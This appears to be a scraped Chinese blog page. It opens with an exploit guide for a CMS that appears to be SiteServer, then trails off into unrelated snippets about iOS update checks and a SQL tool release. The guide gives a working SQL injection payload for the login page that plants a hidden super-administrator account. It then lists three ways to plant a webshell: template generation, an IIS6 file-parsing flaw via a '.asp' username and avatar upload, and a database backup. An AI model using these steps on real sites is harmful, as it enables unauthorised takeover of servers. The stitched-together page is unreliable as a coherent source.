exp: 直接訪問usercenter/login.aspx
使用者名稱處輸入: 123′insert into bairong_administrator([username],[password],[passwordformat],[passwordsalt]) values(『blue』,'vffsuzcbpo4=』,'encrypted』,'i7jq4lwc25wkdoqherbwaw==』);insert into bairong_administratorsinroles values(『administrator』,'blue』);insert into bairong_administratorsinroles values(『registereduser』,'blue』);insert into bairong_administratorsinroles values(『consoleadministrator』,'blue』);–
密碼為空
輸入驗證碼後提交
既可向資料庫中插入乙個使用者名為blue 密碼為lanhai的超級使用者。
之後再訪問後台siteserver/login.aspx用插入的使用者登陸
後台拿webshell的三種方法:
一、 站點管理-》顯示功能-》模板管理-》新增單頁模板-》直接生成aspx
二、 成員許可權-》新增使用者-》使用者名為:1.asp 用剛才新增的1.asp去登陸,進去之後上傳個人頭像,利用iis6解析漏洞得webshell (注釋:後台新增使用者時不會驗證是否含有非法字元) 三、 系統工具-》實用工具-》機器引數檢視 可以看到資料庫型別、名稱,web路徑 系統工具-》資料庫工具-》sql語句查詢 這功能做的不錯,直接就相當於乙個查詢分析器,什麼回顯都有,可以backup得webshell,或者利用sqlserver配置不當直接xxoo。
iOS檢查App新版本並更新新版本
檢查新版本 更新 第一種方法 檢查新版本 更新 dispatch async dispatch get global queue dispatch queue priority default,0 檢查新版本更新 void showalert void alertview uialertview a...
CowNewSQL發布新版本
cownewsql發布新版本了,這個版本的推出標誌著cownewsql能正式應用於開發實際了。本版更新列表 1 增加了對create table drop table create index和dropindex的支援。2 修改了n多bug,使用從各方收集到的近百條各種複雜的sql語句全面測試通過!...
勇於嘗試新版本
經常能夠在網上看見這樣的問題 我是使用bootstrap 3 還是bootstrap 4 以前的我也是認為老的版本比較穩定。但是自從前一段時間,看見了一種觀點 技術是不斷往前發展的,如果一直使用老版本,那麼就很難有進步。我認為這種觀點很對,新的版本修復了或者說改變了很多以前的問題。而且舊版本的東西很...